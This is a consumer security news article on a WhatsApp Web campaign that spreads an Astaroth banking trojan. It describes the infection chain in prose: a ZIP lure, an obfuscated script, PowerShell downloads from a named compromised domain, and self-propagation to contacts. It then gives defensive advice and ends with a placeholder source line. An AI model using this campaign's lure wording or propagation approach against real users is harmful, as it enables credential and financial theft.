A new malware campaign is exploiting WhatsApp Web to spread Astaroth banking trojan through trusted conversations, posing significant risks to users.
A recent malware campaign is transforming WhatsApp Web into a tool for cybercriminals. Security researchers have identified a banking Trojan linked to Astaroth that spreads automatically through chat messages, complicating efforts to halt the attack once it begins. This campaign, dubbed Boto Cor-de-Rosa, highlights the evolving tactics of cybercriminals who exploit trusted communication platforms.
The attack primarily targets Windows users, utilizing WhatsApp Web as both the delivery mechanism and the means of further spreading the infection. The process begins innocuously with a message from a contact containing what appears to be a harmless ZIP file. The file name is designed to look random and benign, which reduces the likelihood of suspicion.
Upon opening the ZIP file, users unwittingly execute a Visual Basic script disguised as a standard document. If the script is run, it quietly downloads two additional pieces of malware, including the Astaroth banking trojan, which is written in Delphi. Additionally, a Python-based module is installed to control WhatsApp Web, allowing the malware to operate in the background without any obvious warning signs. This self-sustaining infection mechanism makes the campaign particularly dangerous.
What sets this campaign apart is its method of propagation. The Python module scans the victim’s WhatsApp contacts and automatically sends the malicious ZIP file to every conversation. Researchers from Acronis have noted that the malware even tailors its messages based on the time of day, often including friendly greetings to make the communication feel familiar. Messages such as “Here is the requested file. If you have any questions, I’m available!” appear to come from trusted contacts, leading many recipients to open them without hesitation.
The malware is also designed to monitor its own effectiveness in real time. The propagation tool tracks the number of successfully delivered messages, failed attempts, and the overall sending speed. After every 50 messages, it generates progress updates, allowing attackers to measure their success quickly and adapt their strategies as needed.
To evade detection by antivirus software, the initial script is heavily obfuscated. Once executed, it launches PowerShell commands that download additional malware from compromised websites, including a known domain, coffe-estilo.com. The malware installs itself in a folder that mimics a Microsoft Edge cache directory, containing executable files and libraries that comprise the full Astaroth banking payload. This allows the malware to steal credentials, monitor user activity, and potentially access financial accounts.
WhatsApp Web’s popularity stems from its ability to mirror phone conversations on a computer, making it convenient for users to send messages and share files. However, this convenience also introduces significant risks. When users connect their phones to WhatsApp Web by scanning a QR code at web.whatsapp.com, the browser session becomes a trusted extension of their account. This means that if malware gains access to a computer with an active WhatsApp Web session, it can act on behalf of the user, reading messages, accessing contact lists, and sending files that appear legitimate.
This exploitation of WhatsApp Web as a delivery system for malware is particularly concerning. Rather than infiltrating WhatsApp itself, attackers take advantage of an open browser session to spread malicious files automatically. Many users remain unaware of the potential dangers, as WhatsApp Web often feels harmless and is frequently left signed in on shared or public computers. In these scenarios, malware does not require sophisticated methods; it simply needs access to a trusted session.
To mitigate the risks associated with this type of malware, users should adopt several smart habits. First and foremost, never open ZIP files sent through chat unless you have confirmed the sender’s identity. Be cautious of file names that appear random or unfamiliar, and treat messages that create a sense of urgency or familiarity as potential warning signs. If a file arrives unexpectedly, take a moment to verify its authenticity before clicking.
Additionally, users should regularly check active WhatsApp Web sessions and log out of any that are unrecognized. Avoid leaving WhatsApp Web signed in on shared or public computers, and enable two-factor authentication (2FA) within WhatsApp settings. Limiting web access can significantly reduce the potential spread of malware.
Keeping devices updated is also crucial. Installing Windows updates promptly and ensuring that web browsers are fully updated can close many vulnerabilities that attackers exploit. Strong antivirus software is essential for monitoring script abuse and PowerShell activity in real time, providing an additional layer of protection against malware.
Banking malware is often associated with identity theft and financial fraud. To minimize the fallout from such attacks, consider reducing your digital footprint. Data removal services can assist in removing personal information from data broker sites, making it harder for criminals to exploit your details if malware infiltrates your device. While no service can guarantee complete data removal from the internet, these services actively monitor and erase personal information from numerous websites, enhancing your privacy.
Even with robust security measures in place, financial monitoring adds another layer of protection. Identity theft protection services can track suspicious activity related to your credit and personal data, alerting you if your information is being sold on the dark web or used to open unauthorized accounts. Setting up alerts for bank and credit card transactions can help you respond quickly to any irregularities.
Most malware infections occur when users act too quickly. If a message feels suspicious, trust your instincts. Familiar names and friendly language can lower your guard, but they should never replace caution. Taking a moment to verify the authenticity of a message or file can prevent significant damage.
This WhatsApp Web malware campaign serves as a stark reminder that cyberattacks are increasingly sophisticated, often blending seamlessly into everyday conversations. The ease with which this threat can spread from one device to many is alarming. A single click can transform a trusted chat into a vehicle for banking malware and identity theft. Fortunately, simple changes in behavior, such as being vigilant about attachments, securing WhatsApp Web access, keeping devices updated, and exercising caution before clicking, can significantly reduce the risk of falling victim to such attacks.
As messaging platforms continue to play a larger role in our daily lives, maintaining awareness and adopting simple security habits is essential. Do you believe messaging apps are doing enough to protect users from malware that spreads through trusted conversations? Share your thoughts with us.
According to Source Name.